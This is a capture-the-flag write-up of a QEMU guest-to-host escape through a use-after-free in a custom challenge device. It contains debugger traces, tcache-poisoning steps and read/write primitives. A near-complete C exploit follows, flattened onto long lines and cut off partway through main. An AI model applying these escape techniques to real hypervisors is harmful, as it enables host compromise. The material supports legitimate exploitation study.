#4 0x0000555555c0833c in access_with_adjusted_size (addr=24, value=0x7ffff504b9f8, size=4, access_size_min=4, access_size_max=4, access_fn=0x555555c08018 <memory_region_write_accessor>, mr=0x5555576a0c80, attrs=...) at ../softmmu/memory.c :552
#5 0x0000555555c0b3ef in memory_region_dispatch_write (mr=0x5555576a0c80, addr=24, data=1, op=MO_32, attrs=...) at ../softmmu/memory.c :1501
#6 0x0000555555c238fe in flatview_write_continue (fv=0x7fffa8028640, addr=4273934360, attrs=..., ptr=0x7ffff504bc74, len=4, addr1=24, l=4, mr=0x5555576a0c80) at ../softmmu/physmem.c :2759
#7 0x0000555555c23a47 in flatview_write (fv=0x7fffa8028640, addr=4273934360, attrs=..., buf=0x7ffff504bc74, len=4) at ../softmmu/physmem.c :2799
#8 0x0000555555c23dc3 in address_space_write (as=0x55555667de00 <address_space_memory>, addr=4273934360, attrs=..., buf=0x7ffff504bc74, len=4) at ../softmmu/physmem.c :2891
#9 0x0000555555c23e34 in address_space_rw (as=0x55555667de00 <address_space_memory>, addr=4273934360, attrs=..., buf=0x7ffff504bc74, len=4, is_write=true) at ../softmmu/physmem.c :2901
#10 0x0000555555a258d1 in dma_memory_rw_relaxed (as=0x55555667de00 <address_space_memory>, addr=4273934360, buf=0x7ffff504bc74, len=4, dir=DMA_DIRECTION_FROM_DEVICE) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/sysemu/dma.h :87
#11 0x0000555555a25926 in dma_memory_rw (as=0x55555667de00 <address_space_memory>, addr=4273934360, buf=0x7ffff504bc74, len=4, dir=DMA_DIRECTION_FROM_DEVICE) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/sysemu/dma.h :110
#12 0x0000555555a25996 in dma_memory_write (as=0x55555667de00 <address_space_memory>, addr=4273934360, buf=0x7ffff504bc74, len=4) at /home/flyyy/Desktop/qemu-vul/qemu-5.2.0-rc4/include/sysemu/dma.h :122
#13 0x0000555555a25a94 in put_result (fun=0x5555576a0390, val=1) at ../hw/misc/fun.c :56
#14 0x0000555555a25c1d in handle_data_write (fun=0x5555576a0390, req=0x7fffa90dcc00, val=0) at ../hw/misc/fun.c :87
#15 0x0000555555a25d98 in fun_mmio_read (opaque=0x5555576a0390, addr=16, size=4) at ../hw/misc/fun.c :123
#16 0x0000555555c07e3c in memory_region_read_accessor (mr=0x5555576a0c80, addr=16, value=0x7ffff504be88, size=4, shift=0, mask=4294967295, attrs=...) at ../softmmu/memory.c :442
#17 0x0000555555c0833c in access_with_adjusted_size (addr=16, value=0x7ffff504be88, size=4, access_size_min=4, access_size_max=4, access_fn=0x555555c07df6 <memory_region_read_accessor>, mr=0x5555576a0c80, attrs=...) at ../softmmu/memory.c :552
#18 0x0000555555c0b02c in memory_region_dispatch_read1 (mr=0x5555576a0c80, addr=16, pval=0x7ffff504be88, size=4, attrs=...) at ../softmmu/memory.c :1420
#19 0x0000555555c0b11a in memory_region_dispatch_read (mr=0x5555576a0c80, addr=16, pval=0x7ffff504be88, op=MO_32, attrs=...) at ../softmmu/memory.c :1449
#20 0x0000555555bc8957 in io_readx (env=0x5555569448d0, iotlbentry=0x7fffa8e101f0, mmu_idx=1, addr=140006722416656, retaddr=140736229919352, access_type=MMU_DATA_LOAD, op=MO_32) at ../accel/tcg/cputlb.c :1317
#21 0x0000555555bc9df1 in load_helper (env=0x5555569448d0, addr=140006722416656, oi=33, retaddr=140736229919352, op=MO_32, code_read=false, full_load=0x555555bca160 <full_le_ldul_mmu>) at ../accel/tcg/cputlb.c :1872
#22 0x0000555555bca1aa in full_le_ldul_mmu (env=0x5555569448d0, addr=140006722416656, oi=33, retaddr=140736229919352) at ../accel/tcg/cputlb.c :1968
#23 0x0000555555bca1e2 in helper_le_ldul_mmu (env=0x5555569448d0, addr=140006722416656, oi=33, retaddr=140736229919352) at ../accel/tcg/cputlb.c :1975
#24 0x00007fffb4fdcb63 in code_gen_buffer ()
#25 0x0000555555b95552 in cpu_tb_exec (cpu=0x55555693c070, itb=0x7fffb4fdc900 <code_gen_buffer+45725907>) at ../accel/tcg/cpu-exec.c :178
#26 0x0000555555b96403 in cpu_loop_exec_tb (cpu=0x55555693c070, tb=0x7fffb4fdc900 <code_gen_buffer+45725907>, last_tb=0x7ffff504c5b8, tb_exit=0x7ffff504c5b0) at ../accel/tcg/cpu-exec.c :658
#27 0x0000555555b966fb in cpu_exec (cpu=0x55555693c070) at ../accel/tcg/cpu-exec.c :771
#28 0x0000555555bab751 in tcg_cpu_exec (cpu=0x55555693c070) at ../accel/tcg/tcg-cpus.c :243
#29 0x0000555555babcc2 in tcg_cpu_thread_fn (arg=0x55555693c070) at ../accel/tcg/tcg-cpus.c :427
#30 0x0000555555e77a29 in qemu_thread_start (args=0x55555696b890) at ../util/qemu-thread-posix.c :521
#31 0x00007ffff781b609 in start_thread (arg=<optimized out>) at pthread_create.c :477
#32 0x00007ffff773e353 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S :95
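After delete_req returns, handle_data_* keeps using the req it was passed, which has now been freed, so this is a UAF.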
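The re-entrancy can be reduced to a toy model. This sketch is not QEMU code: `ToyDev`, `toy_bus_write`, and `toy_handle_data` are hypothetical stand-ins for FunState, address_space_write, and handle_data_*. The base 0xfebf1000 is taken from the backtrace above, where addr=4273934360 equals 0xfebf1018. The model only reports whether the cached pointer has become dangling and never dereferences it.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

#define MMIO_BASE  0xfebf1000u /* BAR0 guest physical base seen in the backtrace */
#define MMIO_SIZE  0x1000u
#define REG_DELETE 0x18u

typedef struct ToyDev {
    uint32_t result_addr;
    void *req; /* stands in for FunReq */
} ToyDev;

/* Models the DELETE_REQ case of fun_mmio_write(). */
static void toy_mmio_write(ToyDev *d, uint32_t off)
{
    if (off == REG_DELETE && d->req) {
        free(d->req);
        d->req = NULL;
    }
}

/* Toy address space: writes that hit the BAR are routed back into the device. */
static void toy_bus_write(ToyDev *d, uint32_t gpa)
{
    if (gpa >= MMIO_BASE && gpa - MMIO_BASE < MMIO_SIZE) {
        toy_mmio_write(d, gpa - MMIO_BASE);
    }
    /* Writes to ordinary RAM are ignored in this model. */
}

/* Models handle_data_*: returns true if the cached req pointer is dangling
 * by the time the real device would dereference it. */
static bool toy_handle_data(ToyDev *d)
{
    void *cached = d->req;            /* s->req was passed by value */
    toy_bus_write(d, d->result_addr); /* put_result(s, 1) */
    return cached != NULL && d->req == NULL;
}
```

With result_addr set to MMIO_BASE + REG_DELETE the function reports a dangling pointer; with any RAM address it does not.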
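Exploitation
Two chunks are actually enough to complete the exploit, but one is not, because the handle_data_* functions require req->total_size to be nonzero (with SIZE = (n - 1) << 10 as used below, a single chunk would mean SIZE = 0).
We create a req and allocate three chunks in req.list.
The UAF is triggered on the path fun_mmio_read->handle_data_write->dma_memory_write. By then req has been freed and req.list[0] overlaps the tcache key field, so the data read through req.list[0] is actually the contents of tcache_perthread_struct. This leaks the address of req. A pointer located just after tcache_perthread_struct, which points to memory holding a QEMU address, can be leaked as well.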
mmio_init("0000:00:04.0", 0);
uint8_t *buf = mmap(NULL, getpagesize(), PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
size_t buf_paddr = virt_to_phys(buf);

mmio_write32(SIZE, (3 - 1) << 10);
mmio_write32(ADDR, buf_paddr);
mmio_write32(INDEX, 0);
mmio_write32(RESULT_ADDR, mmio_phys_base() + DELETE_REQ);
mmio_write32(CREATE_REQ, 0x114514);
mmio_read32(HANDLE_DATA);

qword_dump("leak req addr from tcache_perthread_struct (req->list[0])", buf, 0x400);
size_t req_addr = *(size_t *)(buf + 0x278);
printf("[+] req addr: %#llx\n", req_addr);
size_t qemu_leak_addr = *(size_t *)(buf + 0x358);
printf("[+] qemu_leak addr: %#llx\n", qemu_leak_addr);
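Why req.list[0] ends up pointing at tcache_perthread_struct follows from the struct layouts. The sketch below assumes a 64-bit target and the tcache_entry layout of glibc 2.29 through 2.33 (a next pointer followed by a key pointer). `tcache_entry_model` and `FunReqModel` are local models for illustration, not the real definitions.

```c
#include <stddef.h>
#include <stdint.h>

/* User-data view of a freed chunk sitting in a tcache bin (assumed layout). */
typedef struct tcache_entry_model {
    struct tcache_entry_model *next; /* next free chunk in the same bin */
    void *key;                       /* set by free() to the owning tcache struct */
} tcache_entry_model;

/* Same field layout as FunReq in the device source. */
typedef struct FunReqModel {
    uint32_t total_size; /* followed by 4 bytes of padding on 64-bit targets */
    void *list[127];
} FunReqModel;

/* Returns 1 when list[0] occupies the same bytes as the tcache key field. */
static int list0_overlaps_key(void)
{
    return offsetof(FunReqModel, list) == offsetof(tcache_entry_model, key);
}
```

Under these assumptions, freeing req overwrites total_size with the next pointer and list[0] with the key, while list[1] and list[2] keep their stale values.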
While debugging, switch to thread 3 to inspect the tcache state:
pwndbg> threads
global_num name status pc symbol
------------ --------------- -------- -------------- ----------------------------------
1 qemu-system-x86 stopped 0x7ffff7731cb6 ppoll+166
2 qemu-system-x86 stopped 0x7ffff773795d syscall+29
3 qemu-system-x86 stopped 0x7ffff7822376 pthread_cond_wait@@GLIBC_2.3.2+534
Showing 3 of 3 threads.
pwndbg> thread 3
[Switching to thread 3 (Thread 0x7ffff504d700 (LWP 10251))]
#0 futex_wait_cancelable (private =<optimized out>, expected =0, futex_word =0x55555696b878) at ../sysdeps/nptl/futex-internal.h :183
183 ../sysdeps/nptl/futex-internal.h: No such file or directory.
pwndbg> tcachebins
tcachebins
...
0x410 [ 4] : 0x7fffa9165c00 —▸ 0x7fffa9285a00 —▸ 0x7fffa8e0fd50 —▸ 0x7fffa90dc400 ◂— 0
The req structure now looks like this:
pwndbg> p *(FunReq*)0x7fffa9165c00
$1 = {
total_size = 2837993984,
list = {0x7fffa80008d0 "\a", 0x7fffa8e0fd50 "", 0x7fffa9285a00 "P\375\340\250\377\177", 0x0 <repeats 124 times>}
}
The two leaked values sit at offsets 0x278 and 0x358 from the start of the tcache structure:
pwndbg> tcache
tcache is pointing to: 0x7fffa80008d0 for thread 3
{
counts = {7 <repeats 32 times>, 0, 7, 7, 0, 1, 0, 1, 1, 0, 2, 2, 0, 2, 1, 2, 0, 0, 3, 0, 1, 1, 0, 1, 2, 0, 0, 0, 1, 2, 2, 2, 4},
entries = {0x7fffa835a1a0, 0x7fffa82ac110, 0x7fffa8ffdb90, 0x7fffa80aaa30, 0x7fffa833ba00, 0x7fffa836b390, 0x7fffa8371a00, 0x7fffa8343a20, 0x7fffa8366960, 0x7fffa834f200, 0x7fffa8346740, 0x7fffa8341a30, 0x7fffa8350a00, 0x7fffa8251800, 0x7fffa83}
}
pwndbg> telescope 0x7fffa80008d0+0x278
00:0000│ 0x7fffa8000b48 —▸ 0x7fffa9165c00 —▸ 0x7fffa9285a00 —▸ 0x7fffa8e0fd50 —▸ 0x7fffa90dc400 ◂— ...
01:0008│ 0x7fffa8000b50 ◂— 0
02:0010│ 0x7fffa8000b58 ◂— 0x98c5
03:0018│ 0x7fffa8000b60 —▸ 0x7fffa800b7e0 ◂— 0xffff0000f038
04:0020│ 0x7fffa8000b68 —▸ 0x7fffa8012430 ◂— 0
05:0028│ 0x7fffa8000b70 —▸ 0x7fffa800a420 —▸ 0x7fffa80a1950 —▸ 0x7fffa804cc00 —▸ 0x7fffa80590a0 ◂— ...
06:0030│ 0x7fffa8000b78 —▸ 0x7fffa800a420 —▸ 0x7fffa80a1950 —▸ 0x7fffa804cc00 —▸ 0x7fffa80590a0 ◂— ...
07:0038│ 0x7fffa8000b80 ◂— 0
pwndbg> telescope 0x7fffa80008d0+0x358
00:0000│ 0x7fffa8000c28 —▸ 0x7fffb4fede58 (code_gen_buffer+45796907) —▸ 0x555555cc1795 (helper_lookup_tb_ptr) ◂— endbr64
01:0008│ 0x7fffa8000c30 —▸ 0x7fffefffdc00 (code_gen_buffer+1035717587) ◂— 0
02:0010│ 0x7fffa8000c38 ◂— 0x4d0e
03:0018│ 0x7fffa8000c40 ◂— 0
04:0020│ 0x7fffa8000c48 —▸ 0x7fffa800b6e8 ◂— 0x3290a8aa01
05:0028│ 0x7fffa8000c50 —▸ 0x7fffa800b760 ◂— 0
06:0030│ 0x7fffa8000c58 —▸ 0x7fffa800b768 —▸ 0x7fffa800b7b8 —▸ 0x7fffa800b790 ◂— 0
07:0038│ 0x7fffa8000c60 —▸ 0x7fffa800a430 ◂— 0x10003
pwndbg> vmmap 0x555555cc1795
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
Start End Perm Size Offset File
0x555555554000 0x555555808000 r--p 2b4000 0 /home/ubuntu/Desktop/RWCTF2021_Easy_escape/RWCTF-Easy_escape/qemu-system-x86_64
► 0x555555808000 0x555555ec9000 r-xp 6c1000 2b4000 /home/ubuntu/Desktop/RWCTF2021_Easy_escape/RWCTF-Easy_escape/qemu-system-x86_64 +0x4b9795
0x555555ec9000 0x555556403000 r--p 53a000 975000 /home/ubuntu/Desktop/RWCTF2021_Easy_escape/RWCTF-Easy_escape/qemu-system-x86_64
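The offset 0x278 is not arbitrary: it is where the 0x410 bin's head pointer lives. As a worked check, assuming the glibc 2.30+ layout on x86-64 (64 bins, 16-bit counts, 16-byte alignment, 0x20 minimum chunk size), the offset can be derived as follows. `tcache_model` and the helper names are illustrative.

```c
#include <stddef.h>
#include <stdint.h>

#define TCACHE_BINS 64
#define MIN_CHUNK   0x20u /* smallest chunk size on x86-64 */
#define ALIGNMENT   0x10u /* malloc alignment on x86-64 */

/* Assumed layout of tcache_perthread_struct. */
typedef struct tcache_model {
    uint16_t counts[TCACHE_BINS];
    void *entries[TCACHE_BINS];
} tcache_model;

/* Bin index for a chunk size (header included), e.g. 0x410 for malloc(0x400). */
static size_t tcache_bin_index(size_t chunk_size)
{
    return (chunk_size - MIN_CHUNK + ALIGNMENT - 1) / ALIGNMENT;
}

/* Offset of that bin's head pointer from the start of the struct. */
static size_t tcache_entry_offset(size_t chunk_size)
{
    return offsetof(tcache_model, entries) +
           tcache_bin_index(chunk_size) * sizeof(void *);
}
```

For chunk size 0x410 this gives bin 63 and offset 0x80 + 63 * 8 = 0x278. The modeled struct is 0x280 bytes long, so offset 0x358 lies past its end, in whatever the heap placed next.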
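Create req again.
Then, on the path fun_mmio_write->handle_data_read->dma_memory_read, use the UAF to overwrite the fd (the tcache next pointer) of the freed req.list[1] chunk so that it points to req.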
*(size_t *)(buf + (1 << 10)) = req_addr;
mmio_write32(SIZE, (3 - 1) << 10);
mmio_write32(ADDR, buf_paddr);
mmio_write32(INDEX, 1);
mmio_write32(RESULT_ADDR, mmio_phys_base() + DELETE_REQ);
mmio_write32(CREATE_REQ, 0x114514);
mmio_write32(HANDLE_DATA, 0x1919810);
0x410 [ 4] : 0x7fffa91eec00 —▸ 0x7fffa9165c00 —▸ 0x7fffa90dc400 ◂— 0x7fffa91eec00
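When req is created once more, req.list[2] points to req itself, which gives us a self-write on req. req.list[0] is NULL because tcache zeroes the key field when it hands out a chunk: the chunk returned for list[2] is req itself, and its key field overlaps req.list[0].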
mmio_write32(RESULT_ADDR, buf_paddr + 0x400);
mmio_write32(SIZE, (3 - 1) << 10);
mmio_write32(CREATE_REQ, 0x114514);
mmio_write32(INDEX, 2);
pwndbg> p *(FunReq*)0x7fffa91eec00
$2 = {
total_size = 2048,
list = {0x0 , 0x7fffa90dc400 "", 0x7fffa91eec00 "", 0x0 <repeats 124 times>}
}
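The way the poisoned next pointer turns into req.list[2] == req can be replayed with a toy LIFO free list. This is a simplified model of a single tcache bin: no counts, no safe-linking, and none of the memset that create_req performs. `Chunk`, `Bin`, and `replay_poisoning` are illustrative names.

```c
#include <stddef.h>

typedef struct Chunk {
    struct Chunk *next; /* tcache_entry.next */
    void *key;          /* tcache_entry.key, overlaps FunReq.list[0] */
} Chunk;

typedef struct Bin {
    Chunk *head;
} Bin;

/* free(): push onto the bin and stamp the key. */
static void bin_put(Bin *b, Chunk *c)
{
    c->key = b;
    c->next = b->head;
    b->head = c;
}

/* malloc(): pop from the bin and clear the key. */
static Chunk *bin_get(Bin *b)
{
    Chunk *c = b->head;
    b->head = c->next;
    c->key = NULL;
    return c;
}

/* Returns 1 if the third allocation for list[] aliases req and req's key
 * slot (list[0]) was cleared by that allocation. */
static int replay_poisoning(void)
{
    Chunk req, l0, l1, l2;
    Bin bin = { NULL };

    /* delete_req() frees list[0], list[1], list[2], then req. */
    bin_put(&bin, &l0);
    bin_put(&bin, &l1);
    bin_put(&bin, &l2);
    bin_put(&bin, &req);

    /* UAF write through the stale list[1]: its first 8 bytes become &req. */
    l1.next = &req;

    /* Next create_req(): req first, then list[0], list[1], list[2]. */
    Chunk *new_req = bin_get(&bin);
    Chunk *n0 = bin_get(&bin);
    Chunk *n1 = bin_get(&bin);
    Chunk *n2 = bin_get(&bin);

    return new_req == &req && n0 == &l2 && n1 == &l1 &&
           n2 == new_req && new_req->key == NULL;
}
```

The bin order before the final create is req, l2, l1, req, which matches the cycle shown in the tcachebins output above.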
Using this self-write on req, we can point list[0] at a target address, which gives us arbitrary address read and write.
void arbitrary_address_read(size_t address)
{
    mmio_write32(SIZE, (3 - 1) << 10);
    mmio_write32(INDEX, 2);
    *(size_t *)(buf + (2 << 10)) = (3 - 1) << 10;
    *(size_t *)(buf + (2 << 10) + 8) = address;
    *(size_t *)(buf + (2 << 10) + 0x10) = 0;
    *(size_t *)(buf + (2 << 10) + 0x18) = req_addr;
    mmio_write32(HANDLE_DATA, 0x114514);
    mmio_write32(INDEX, 0);
    mmio_read32(HANDLE_DATA);
}

void arbitrary_address_write(size_t address)
{
    mmio_write32(SIZE, (3 - 1) << 10);
    mmio_write32(INDEX, 2);
    *(size_t *)(buf + (2 << 10)) = (3 - 1) << 10;
    *(size_t *)(buf + (2 << 10) + 8) = address;
    *(size_t *)(buf + (2 << 10) + 0x10) = 0;
    *(size_t *)(buf + (2 << 10) + 0x18) = req_addr;
    mmio_write32(HANDLE_DATA, 0x114514);
    mmio_write32(INDEX, 0);
    mmio_write32(HANDLE_DATA, 0x1919810);
}
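Both primitives first overwrite req with a forged header through list[2], then operate on index 0. The four stores at buf + (2 << 10) build that header. A minimal sketch of the same layout, with `build_fake_req` as a hypothetical helper that does not appear in the exploit:

```c
#include <stdint.h>
#include <string.h>

/* Fills the first 0x20 bytes of a 1 KB staging chunk with a forged FunReq:
 *   +0x00 total_size (upper 4 bytes are padding)
 *   +0x08 list[0] = target of the next read or write
 *   +0x10 list[1] = unused
 *   +0x18 list[2] = req itself, so the self-write stays available */
static void build_fake_req(uint8_t *chunk, uint32_t total_size,
                           uint64_t target, uint64_t req_addr)
{
    uint64_t header[4] = { total_size, target, 0, req_addr };
    memcpy(chunk, header, sizeof(header));
}
```

Since handle_data_read copies the full 0x400 bytes, the remainder of the staging chunk lands in list[3..126] and should stay zero.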
What remains is routine: leak the QEMU base address, then overwrite the QEMUTimerList that main_loop_tlg points to in order to escape.
arbitrary_address_read(qemu_leak_addr);
size_t qemu_base = *(size_t *)buf - 0x6761b0;
printf("[+] qemu base: %#llx\n", qemu_base);
size_t system_plt = qemu_base + 0x2b8a70;
printf("[*] system@plt addr: %#llx\n", system_plt);
size_t main_loop_tlg_addr = qemu_base + 0x112cd40;
printf("[*] main_loop_tlg addr: %#llx\n", main_loop_tlg_addr);

arbitrary_address_read(main_loop_tlg_addr);
size_t QEMUTimerList_addr = *(size_t *)(buf);
printf("[+] QEMUTimer addr: %#llx\n", QEMUTimerList_addr);

arbitrary_address_read(QEMUTimerList_addr);
*(size_t *)(buf + 0x58) = system_plt;
*(size_t *)(buf + 0x60) = QEMUTimerList_addr + 0x200;
strcpy(buf + 0x200, "/usr/bin/gnome-calculator");
arbitrary_address_write(QEMUTimerList_addr);
Full exploit
#include <ctype.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdint.h>
#include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <errno.h> void qword_dump (char * desc, void * addr, int len) { uint64_t * buf64 = (uint64_t *)addr; uint8_t * buf8 = (uint8_t *)addr; if (desc != NULL ) { printf ("[*] %s:\n" , desc); } for (int i = 0 ; i < len / 8 ; i += 4 ) { printf (" %04x" , i * 8 ); for (int j = 0 ; j < 4 ; j++) { i + j < len / 8 ? printf (" 0x%016lx" , buf64[i + j]) : printf (" " ); } printf (" " ); for (int j = 0 ; j < 32 && j + i * 8 < len; j++) { printf ("%c" , isprint (buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.' ); } puts ("" ); } } #define _GNU_SOURCE #include <errno.h> #include <fcntl.h> #include <inttypes.h> #include <stdbool.h> #include <stddef.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <limits.h> #include <string.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #define IORESOURCE_MEM 0x00000200ULL typedef struct { volatile uint8_t * bar; size_t size; size_t map_len; int fd; int res_idx; uint64_t phys_start; uint64_t phys_end; unsigned long long res_flags; bool inited; } mmio_ctx_t ; static mmio_ctx_t g_mmio = {0 };static int build_paths (const char * bdf_or_path, char * resource_txt, size_t txt_sz, char * dev_dir, size_t dir_sz) { if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1 ; } if (strchr (bdf_or_path, '/' )) { snprintf (resource_txt, txt_sz, "%s" , bdf_or_path); snprintf (dev_dir, dir_sz, "%s" , bdf_or_path); char * slash = strrchr (dev_dir, '/' ); if (!slash) { errno = EINVAL; return -1 ; } *slash = '\0' ; if (strstr (resource_txt, "/resource" ) && resource_txt[strlen (resource_txt) - 1 ] >= '0' && resource_txt[strlen (resource_txt) - 1 ] <= '9' ) { snprintf (resource_txt, txt_sz, "%s/resource" , dev_dir); } } else { snprintf (resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource" , bdf_or_path); snprintf (dev_dir, dir_sz, "/sys/bus/pci/devices/%s" , bdf_or_path); } return 0 ; } static int parse_mem_bar 
(const char * resource_txt, int bar_idx, unsigned long long * start, unsigned long long * end, unsigned long long * flags, int * picked_idx) { FILE* fp = fopen(resource_txt, "r" ); if (!fp) return -1 ; int idx = 0 , sel = -1 ; char line[256 ]; while (fgets(line, sizeof (line), fp)) { unsigned long long s = 0 , e = 0 , f = 0 ; if (sscanf (line, "%llx %llx %llx" , &s, &e, &f) != 3 ) { idx++; continue ; } if (bar_idx >= 0 ) { if (idx == bar_idx) { if (!(f & IORESOURCE_MEM) || e < s) { fclose(fp); errno = EINVAL; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } else { if (idx <= 5 && (f & IORESOURCE_MEM)) { if (e < s) { fclose(fp); errno = ERANGE; return -1 ; } sel = idx; if (start) *start = s; if (end) *end = e; if (flags) *flags = f; break ; } } idx++; } fclose(fp); if (sel < 0 ) { errno = ENOENT; return -1 ; } if (picked_idx) *picked_idx = sel; return 0 ; } int mmio_init (const char * bdf_or_path, int bar_idx) { if (g_mmio.inited) { errno = EALREADY; return -1 ; } char resource_txt[PATH_MAX]; char dev_dir[PATH_MAX]; if (build_paths(bdf_or_path, resource_txt, sizeof (resource_txt), dev_dir, sizeof (dev_dir)) != 0 ) return -1 ; unsigned long long start = 0 , end = 0 , flags = 0 ; int res_idx = -1 ; if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0 ) return -1 ; size_t size = (size_t )((end - start) + 1ULL ); size_t pg = (size_t )sysconf(_SC_PAGESIZE); size_t map_len = (size + pg - 1 ) & ~(pg - 1 ); char res_path[PATH_MAX]; snprintf (res_path, sizeof (res_path), "%s/resource%d" , dev_dir, res_idx); int fd = open(res_path, O_RDWR | O_SYNC); if (fd < 0 ) return -1 ; void * map = mmap(NULL , map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0 ); if (map == MAP_FAILED) { int sv = errno; close(fd); errno = sv; return -1 ; } g_mmio.bar = (volatile uint8_t *)map ; g_mmio.size = size; g_mmio.map_len = map_len; g_mmio.fd = fd; g_mmio.res_idx = res_idx; g_mmio.phys_start = (uint64_t )start; 
g_mmio.phys_end = (uint64_t )end; g_mmio.res_flags = flags; g_mmio.inited = true ; return 0 ; } void mmio_fini (void ) { if (!g_mmio.inited) return ; if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len); if (g_mmio.fd >= 0 ) close(g_mmio.fd); memset (&g_mmio, 0 , sizeof (g_mmio)); } volatile void * mmio_base (void ) { return g_mmio.bar; }size_t mmio_size (void ) { return g_mmio.size; }int mmio_bar_index (void ) { return g_mmio.res_idx; }uint64_t mmio_phys_base (void ) { return g_mmio.phys_start; }uint64_t mmio_phys_limit (void ) { return g_mmio.phys_end; } uint64_t mmio_offset_to_phys (size_t off) { if (!g_mmio.inited) { errno = EPERM; return 0 ; } if (off >= g_mmio.size) { errno = ERANGE; return 0 ; } return g_mmio.phys_start + (uint64_t )off; } uint64_t mmio_virt_to_phys (const void * p) { if (!g_mmio.inited || !p) { errno = EPERM; return 0 ; } uintptr_t base = (uintptr_t )g_mmio.bar; uintptr_t addr = (uintptr_t )p; if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0 ; } size_t off = (size_t )(addr - base); return g_mmio.phys_start + (uint64_t )off; } static inline int chk (size_t off, size_t width) { if (!g_mmio.inited) { errno = EPERM; return -1 ; } if (off + width > g_mmio.size) { errno = ERANGE; return -1 ; } return 0 ; } uint8_t mmio_read8 (size_t off) { if (chk(off, 1 )) return 0 ; return *(volatile uint8_t *)(g_mmio.bar + off); } uint16_t mmio_read16 (size_t off) { if (chk(off, 2 )) return 0 ; return *(volatile uint16_t *)(g_mmio.bar + off); } uint32_t mmio_read32 (size_t off) { if (chk(off, 4 )) return 0 ; return *(volatile uint32_t *)(g_mmio.bar + off); } uint64_t mmio_read64 (size_t off) { if (chk(off, 8 )) return 0 ; return *(volatile uint64_t *)(g_mmio.bar + off); } void mmio_write8 (size_t off, uint8_t v) { if (chk(off, 1 )) return ; *(volatile uint8_t *)(g_mmio.bar + off) = v; } void mmio_write16 (size_t off, uint16_t v) { if (chk(off, 2 )) return ; *(volatile uint16_t *)(g_mmio.bar + off) = v; } void mmio_write32 (size_t 
off, uint32_t v) { if (chk(off, 4 )) return ; *(volatile uint32_t *)(g_mmio.bar + off) = v; } void mmio_write64 (size_t off, uint64_t v) { if (chk(off, 8 )) return ; *(volatile uint64_t *)(g_mmio.bar + off) = v; } volatile void * mmio_ptr (size_t off) { if (chk(off, 1 )) return NULL ; return (volatile void *)(g_mmio.bar + off); } #include <stdint.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <errno.h> static uint64_t virt_to_phys (void * vaddr) { long pagesize = sysconf(_SC_PAGESIZE); uint64_t va = (uint64_t )vaddr; uint64_t page_index = va / pagesize; uint64_t offset = page_index * sizeof (uint64_t ); int fd = open("/proc/self/pagemap" , O_RDONLY); if (fd < 0 ) return 0 ; uint64_t entry = 0 ; ssize_t n = pread(fd, &entry, sizeof (entry), offset); close(fd); if (n != sizeof (entry)) return 0 ; if (!(entry & (1ULL << 63 )) || (entry & (1ULL << 62 ))) { errno = EFAULT; return 0 ; } uint64_t pfn = entry & ((1ULL << 55 ) - 1 ); return (pfn * pagesize) + (va % pagesize); } enum FUN_OPT { SIZE = 0x00 , ADDR = 0x04 , RESULT_ADDR = 0x08 , INDEX = 0x0C , HANDLE_DATA = 0x10 , CREATE_REQ = 0x14 , DELETE_REQ = 0x18 }; uint8_t buf[3 << 10 ];size_t req_addr;void arbitrary_address_read (size_t address) { mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 2 ); *(size_t *)(buf + (2 << 10 )) = (3 - 1 ) << 10 ; *(size_t *)(buf + (2 << 10 ) + 8 ) = address; *(size_t *)(buf + (2 << 10 ) + 0x10 ) = 0 ; *(size_t *)(buf + (2 << 10 ) + 0x18 ) = req_addr; mmio_write32(HANDLE_DATA, 0x114514 ); mmio_write32(INDEX, 0 ); mmio_read32(HANDLE_DATA); } void arbitrary_address_write (size_t address) { mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 2 ); *(size_t *)(buf + (2 << 10 )) = (3 - 1 ) << 10 ; *(size_t *)(buf + (2 << 10 ) + 8 ) = address; *(size_t *)(buf + (2 << 10 ) + 0x10 ) = 0 ; *(size_t *)(buf + (2 << 10 ) + 0x18 ) = req_addr; mmio_write32(HANDLE_DATA, 0x114514 ); mmio_write32(INDEX, 0 ); mmio_write32(HANDLE_DATA, 0x1919810 ); } 
int main (int argc, char * argv[]) { mmio_init("0000:00:04.0" , 0 ); mmio_write32(ADDR, virt_to_phys(buf)); mmio_write32(RESULT_ADDR, mmio_phys_base() + DELETE_REQ); mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(INDEX, 0 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_read32(HANDLE_DATA); qword_dump("leak req addr from tcache_perthread_struct (req->list[0])" , buf, 0x400 ); req_addr = *(size_t *)(buf + 0x278 ); printf ("[+] req addr: %#llx\n" , req_addr); size_t qemu_leak_addr = *(size_t *)(buf + 0x358 ); printf ("[+] qemu_leak addr: %#llx\n" , qemu_leak_addr); mmio_write32(SIZE, (3 - 1 ) << 10 ); *(size_t *)(buf + (1 << 10 )) = req_addr; mmio_write32(INDEX, 1 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_write32(HANDLE_DATA, 0x1919810 ); mmio_write32(SIZE, (3 - 1 ) << 10 ); mmio_write32(CREATE_REQ, 0x114514 ); mmio_write32(RESULT_ADDR, virt_to_phys(buf) + 0x400 ); 